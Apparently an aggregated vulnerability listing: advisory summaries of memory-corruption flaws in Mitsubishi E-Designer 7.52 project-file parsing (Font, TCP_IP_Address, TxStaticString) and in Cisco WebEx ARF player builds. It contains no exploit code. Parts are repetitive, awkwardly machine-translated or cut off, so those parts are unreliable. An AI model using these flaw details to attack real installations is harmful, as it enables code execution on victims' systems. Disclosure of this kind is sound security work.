Mitsubishi E-Designer, Version 7.52 Build 344 contains six code sections which may be exploited to overwrite the stack. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mitsubishi Electric E-Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within processing of SetupAlarm sections of a mpa (project specification) file. When parsing the property Font, the process fails to properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is an E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities: 1. Multiple stack-based overflow vulnerabilities. 2. Multiple heap-based overflow vulnerabilities. 3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions

Multiple buffer overflow vulnerabilities exist in the Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) files. An attacker could exploit these vulnerabilities by providing a user with a malicious ARF file via email or URL and convincing the user to launch the file. Exploitation of these vulnerabilities could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. The Cisco WebEx Network Recording Player is an application that is used to play back WebEx meeting recordings that have been recorded on the computer of an online meeting attendee. The player can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The following client builds are affected by this vulnerability: Cisco WebEx Business Suite (WBS29) client builds prior to T29.13.130, Cisco WebEx Business Suite (WBS30) client builds prior to T30.17, Cisco WebEx Business Suite (WBS31) client builds prior to T31.10. Cisco Bug IDs: CSCvc47758 CSCvc51227 CSCvc51242. Vendors have confirmed this vulnerability Bug ID CSCvc47758 , CSCvc51227 ,and CSCvc51242 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. A buffer overflow vulnerability exists in Cisco WebExNetworkRecordingPlayer. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Versions prior to 10

Mitsubishi E-Designer, Version 7.52 Build 344 contains five code sections which may be exploited to overwrite the heap. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mitsubishi Electric E-Designer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within processing of a driver configuration file when initializing the BEMicroLogix component. When parsing the property TCP_IP_Address, the process fails to properly validate the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is an E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities: 1. Multiple stack-based overflow vulnerabilities. 2. Multiple heap-based overflow vulnerabilities. 3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions

Mitsubishi E-Designer, Version 7.52 Build 344 contains two code sections which may be exploited to allow an attacker to overwrite arbitrary memory locations. This can result in arbitrary code execution, compromised data integrity, denial of service, and system crash. Mitsubishi E-Designer Contains an out-of-bounds vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within processing of TxStaticString sections of a mpa (project specification) file. An out-of-bounds value for the column specification will cause a user-supplied string to be written to an arbitrary memory address. An attacker can leverage this vulnerability to execute arbitrary code in the context of the Administrator. E-Designer is an E-series programming software from Mitsubishi Electric Europe B.V. Mitsubishi Electric Europe B.V. Mitsubishi E-Designer is prone to the following vulnerabilities: 1. Multiple stack-based overflow vulnerabilities. 2. Multiple heap-based overflow vulnerabilities. 3. Multiple denial-of-service overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions. Mitsubishi E-Designer version 7.52 Build 344 is vulnerable; other versions may also be affected